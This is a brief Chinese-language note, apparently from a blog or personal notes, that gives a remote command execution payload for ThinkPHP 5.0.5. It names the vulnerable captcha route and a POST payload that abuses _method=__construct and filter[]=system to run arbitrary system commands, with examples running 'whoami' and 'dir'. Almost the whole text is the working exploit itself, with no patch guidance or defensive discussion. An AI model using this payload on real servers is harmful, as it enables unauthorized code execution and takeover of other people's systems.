前言
这里的thinkphp版本为5.0.5
访问
http://xx.xx.xx.xx:8080/index.php/?s=captcha
payload
_method=__construct&filter[]=system&method=GET&get[]=系统命令
示例如下
(1)post传入_method=__construct&filter[]=system&method=GET&get[]=whoami
进行命令执行
(2)post传入_method=__construct&filter[]=system&method=GET&get[]=dir
进行命令执行